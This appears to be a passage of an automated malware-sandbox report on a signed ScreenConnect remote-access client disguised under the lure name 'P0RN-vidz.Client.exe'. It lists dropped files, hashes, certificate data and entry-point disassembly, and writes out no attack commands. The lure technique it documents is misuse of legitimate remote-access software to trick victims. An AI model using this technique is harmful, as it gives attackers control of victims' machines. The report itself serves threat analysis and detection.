                                                                                                                                                                                                                                        MD5:DA6B59FA5636B53C758E796A3226ADB7
                                                                                                                                                                                                                                        SHA1:3B6DC82FFD7097455E703C1FC729A1D0F8815898
                                                                                                                                                                                                                                        SHA-256:CCE6DC73141C3E41E026131967AF21BEF625F903FA275913598A55B4D4997678
                                                                                                                                                                                                                                        SHA-512:760B5A348D8E4CA1DEC36420F2C1B979F715650EA691235C2053D5DDCE5228D0652C9FF7A420717A1290F001C8DDB88C83ABC65FFE892DAFF6761B12C0588CBA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                        Entropy (8bit):5.130383203139021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0A5vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A/GVETDTo
                                                                                                                                                                                                                                        MD5:AE2F030FA7A72B3B147D9699F326D545
                                                                                                                                                                                                                                        SHA1:A918B54C0AD8216B1E61D2C0BA35239B6BB5CB74
                                                                                                                                                                                                                                        SHA-256:0884F127D1A5260AC40B7CACEA51F9A994B4E3BEAB6E5C75E848CA3000FEADF9
                                                                                                                                                                                                                                        SHA-512:06857692C0283FA76512060E56D711E87B789A305B3720B0255AF920004DBFAC6C782FCD12E85771A918A2FFEDC55A3723F9D616D2A21F3042E158AC25889504
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1726976
                                                                                                                                                                                                                                        Entropy (8bit):6.640049744810174
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:cOgsFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:FgsJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                        MD5:7E3BCFD89F41083DD30725A9F9C4D0C9
                                                                                                                                                                                                                                        SHA1:B68092FDCF113381B31861C79394AFA0E235252E
                                                                                                                                                                                                                                        SHA-256:FE8C56F3CD7D2EF529DF28756F8C9F961F0DDC81B1F1FBEAC7CE69011AD06E74
                                                                                                                                                                                                                                        SHA-512:C93D0EFD94CD4A34C30816B0371A698187AFFBFA9D74F91E93C48EC69CB7BD94A03ECCC0D6039013ABA7BF6EA16B9ADF996F40562208AEF752B93CCE6EA7FCA3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                        Entropy (8bit):5.057000083875677
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0A1vSkcyMDcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AzHMDGQAXRTFgTo
                                                                                                                                                                                                                                        MD5:979E83C183434FDF0840E13A1BEB2200
                                                                                                                                                                                                                                        SHA1:5EF4A368EA8FF239AEACEFDD109F799F6EA58567
                                                                                                                                                                                                                                        SHA-256:50FE4C046184A3BE4A888C14564F56816BDD47AD3B7C580E0EF8B9FAF1101813
                                                                                                                                                                                                                                        SHA-512:316F0A82D8BE824D8146A69CCE201F5E4D959DB9C56EF85CA5D7BBDF79E19116F8C179CDC2B59ECEDE03B29B6E4EF695A0C792EE207E24295F7C87D1B5FD0428
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61208
                                                                                                                                                                                                                                        Entropy (8bit):6.323071111905421
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6yot+ktY7OUZXPGQDvmDtyQXIE+TCBtIfXWbJe79o7p:6yYtxURPGZyQVwWem
                                                                                                                                                                                                                                        MD5:9191DE53DBFFC88DDBF49B88CC124B74
                                                                                                                                                                                                                                        SHA1:BAD54B6C1EDB1D37158BF3EEA16B0253452F9445
                                                                                                                                                                                                                                        SHA-256:7205B27FCEB210388597BEDD40786809EEC51163225ED6BBA9E7BC0FBB6B8A65
                                                                                                                                                                                                                                        SHA-512:341FA333A23737D6A79A3C98D317E30EEC7BD23C5DD42742603EB900F5DF654ADEAD2CD4B82132B6F614755D5ECBC0E4D7CBCA36240E93CCAB1042EF51C28417
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602392
                                                                                                                                                                                                                                        Entropy (8bit):6.179677334154197
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:ayB4P+n4htgqvqURfRa5CgSM4ZrvR/YKcSAwqrKyKKj414Sc4q2/R4IEyCui5AS2:FB4KsgqyUuiXrveKtCa3CNax
                                                                                                                                                                                                                                        MD5:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        SHA1:AC5F3D13A4084D53D3E0CCE104A9284D998E2B1A
                                                                                                                                                                                                                                        SHA-256:C59947E7D0477E143B3EE9A63F60096F24A07AC4FC018F061473F6D548CBECA4
                                                                                                                                                                                                                                        SHA-512:48716CAF09228AF3D9CD34772AC64CCFFE9FC292EF6CDCC926E885FC10A1BF97B2E889A5F8577CD3C0E55FF00EBD436112ABC1D9B12F57C23B43CC29A1B58172
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                        Entropy (8bit):5.025603000423177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AEHMDAXQ3MDTMDRGTDBTo:1YiW4ALsvcx
                                                                                                                                                                                                                                        MD5:F8EE5554BAB7AE67A2373703243F634E
                                                                                                                                                                                                                                        SHA1:D30490278145AB14366D55959945E7DB1A444FFA
                                                                                                                                                                                                                                        SHA-256:33578584A89CC841B992603039410B1B93907CBFDF0FA6BD0C6E12680A804C02
                                                                                                                                                                                                                                        SHA-512:552087971AD984B4FC36F69E68F46977C0E31E6DD7DF249332D2783F807254DF46C8F8BF7F7F18A48F606CF5C09026620770DF63DC91A636F842F950C22EA174
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                        Entropy (8bit):5.955723401117127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zeNAJBQ4aCaX/f68nEuX9/v2bTX9FX9R/QPIYM7Y7:z66buX9uTX9FX9R/QPIN07
                                                                                                                                                                                                                                        MD5:4739CCEA24F7615F4B5186F8DB9AA006
                                                                                                                                                                                                                                        SHA1:66161FDE108CD3C27770559B5408F08F0EFA0C64
                                                                                                                                                                                                                                        SHA-256:4C5AFFF7D1CED73D787E691D8F1E82D26E4BFF70E2D9001EF220D66C3BC2D041
                                                                                                                                                                                                                                        SHA-512:0EE5B62138BAFDF5252F304963C4F9F3A6D56E3F3C1C2CF209B284FFE5B3F4424BD09DC42F6EE79307258DE74BA0C326C81D0958402CA979602B95409D707900
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.4.2.9083" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):81688
                                                                                                                                                                                                                                        Entropy (8bit):5.8621631504225675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Wty/l44QzbkI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7/T7r3:VdxukLdjTP
                                                                                                                                                                                                                                        MD5:0EE5B092F5EFFA84DB5A1CE93417D8C1
                                                                                                                                                                                                                                        SHA1:21FF86BB144960D36628D649EB1485A646987E02
                                                                                                                                                                                                                                        SHA-256:5859F53DCB98ECB2C427E56BB95A71A1DA8B9937128BF49C82EC17EBE948EA80
                                                                                                                                                                                                                                        SHA-512:A6F6DC72AA5C4C8C9E7B0D03BB710D5B44F90B19EB44BC31DC6B020E685E4F985622A978E775CF892C52CAA679ED78E4ECF0BC03E5D8152A54C1ED8FA88BEBC3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                        Entropy (8bit):4.421612683436905
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:mSvfpi6ceLP/9skLmb0OToWSPHaJG8nAgeMZMMhA2fX4WABlEnNu0uhiTw:FvloToW+EZMM6DFyM03w
                                                                                                                                                                                                                                        MD5:B20FF90A539E082DA3273C30F9DFD210
                                                                                                                                                                                                                                        SHA1:3079D2F831FE59FE0D7DBC0DA7F60BF804FDD83A
                                                                                                                                                                                                                                        SHA-256:0E05254DD04E49EAFBF9E98B03C6CC5C1474460F113376C3915CBBC67414CDD1
                                                                                                                                                                                                                                        SHA-512:9D8511E9973E2FFE76E8BFDC5AD509EE98E60B9ABF1E651941A3398B3CA976828411E3B60A2A7DC3FA03EC4A0678DE00FF482E20CDE393338D05701DF3BF1F26
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):6.48329361336188
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:P0RN-vidz.Client.exe
                                                                                                                                                                                                                                        File size:84'432 bytes
                                                                                                                                                                                                                                        MD5:af0d6501f817b8769618c6cbca8b4f65
                                                                                                                                                                                                                                        SHA1:c6f57c44cfe15d219beb066a2098367e8750c0d4
                                                                                                                                                                                                                                        SHA256:2cbee0d0b19b59d5176a0c9da2385da30f5df66818da9be4614f2a7b7c888967
                                                                                                                                                                                                                                        SHA512:a0fde1cc11a02933c258587aa6bfb1bebe552b5dbc46340226611fb8ec1a1cc043e1aa1c3e098ee71a5dd112ccfd5a3ad98329a5895ff9973125a83ba835f569
                                                                                                                                                                                                                                        SSDEEP:1536:IoFsMHqzISrGqx0WiwbqKHxfd6dldV0OCJRpsWr6cdYV7hsYYYP7tg:99q8tC0C+axfdalBqRfbYRGYYYPO
                                                                                                                                                                                                                                        TLSH:DD834B13B5E18475E9720E3118B1D9B4593FBE114E688EAB3398433A0F351D19E3AE7B
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>{yD_.*D_.*D_.*...*N_.*...*>_.*...*\_.*...+V_.*...+V_.*...+a_.*M'.*A_.*D_.*%_.*W..+E_.*W..*E_.*W..+E_.*RichD_.*........PE..L..
                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                        Entrypoint:0x401489
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x6734FBFF [Wed Nov 13 19:20:31 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                        Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                        Error Number:0
                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                        • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        call 00007F5C68F3F52Bh
                                                                                                                                                                                                                                        jmp 00007F5C68F3EFDFh
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                        call dword ptr [0040B048h]
                                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                                        call dword ptr [0040B044h]
                                                                                                                                                                                                                                        push C0000409h
                                                                                                                                                                                                                                        call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                        call dword ptr [0040B050h]
                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                        sub esp, 00000324h
                                                                                                                                                                                                                                        push 00000017h
                                                                                                                                                                                                                                        call dword ptr [0040B054h]
                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                        je 00007F5C68F3F167h
                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                                        int 29h
                                                                                                                                                                                                                                        mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                        mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                        mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                        mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                        mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                        mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                        mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                        mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                        mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                        mov word ptr [004118A4h], es
                                                                                                                                                                                                                                        mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                        mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                        pop dword ptr [004118D0h]
                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                        mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                        mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                        mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                        mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1061c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
